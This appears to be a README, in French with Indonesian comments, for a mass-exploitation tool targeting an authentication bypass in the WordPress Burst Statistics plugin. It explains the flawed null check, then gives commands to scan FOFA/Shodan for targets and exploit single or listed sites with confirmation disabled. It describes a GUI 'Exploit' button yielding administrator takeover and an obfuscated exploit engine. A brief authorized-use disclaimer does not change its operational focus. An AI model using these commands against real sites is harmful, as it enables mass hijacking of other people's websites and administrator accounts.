
CVE-2026-8181 — Contournement de l'authentification du plugin WordPress Burst Statistics (CVSS 9.8) menant à la prise de contrôle du compte administrateur. Scanner de masse avec intégration FOFA/Shodan et interface graphique moderne.
CVSS 9.8 (Critique) — Contournement de l'authentification menant à la prise de contrôle du compte administrateur
CVE-2026-8181 est une vulnérabilité de contournement de l'authentification dans le plugin WordPress Burst Statistics versions 3.4.0 à 3.4.1.1. Ce plugin est utilisé par plus de 200 000 sites WordPress comme alternative d'analyse respectueuse de la vie privée à Google Analytics.
Cette vulnérabilité permet à un attaquant sans authentification connaissant le nom d'utilisateur admin de :
La fonction is_mainwp_authenticated() dans class-mainwp-proxy.php valide incorrectement la valeur de retour de wp_authenticate_application_password(). Cette fonction renvoie null (et non WP_Error) lorsqu'elle est appelée hors du contexte de l'API REST, et le code ne vérifie que is_wp_error(). Comme null n'est pas une WP_Error, l'authentification est considérée comme réussie.
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
Double-cliquez sur run.bat ou exécutez :
py -3.11 gui_modern.py

Interface graphique moderne de CVE-2026-8181 avec 3 onglets
Dans l'onglet Scan : choisissez la source des cibles (FOFA/Shodan depuis .env, fichier ou manuel) → cliquez sur SCAN TARGETS Dans l'onglet Exploit : saisissez le nom d'utilisateur admin → cliquez sur EXPLOIT

L'outil trouve les cibles vulnérables et prêtes à être exploitées
Si l'exploitation réussit, l'attaquant obtient un accès complet en tant qu'administrateur :

Tableau de bord administrateur WordPress après une exploitation réussie
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.env.envÀ des fins éducatives et de tests d'intrusion autorisés uniquement. Toute utilisation non autorisée sur des systèmes qui ne vous appartiennent pas est illégale. Utilisez-le uniquement sur des sites que vous possédez ou pour lesquels vous disposez d'une autorisation écrite.
| Flag | Description |
|---|
-t, --target | URL cible (unique) |
-l, --list | Fichier contenant la liste des cibles |
-u, --username | Nom d'utilisateur admin (défaut : admin) |
-T, --threads | Nombre de threads (défaut : 10) |
-o, --output | Fichier de sortie des résultats |
-v, --verbose | Sortie de débogage |
--timeout | Délai d'expiration des requêtes (secondes) |
--no-confirm | Ignorer la confirmation |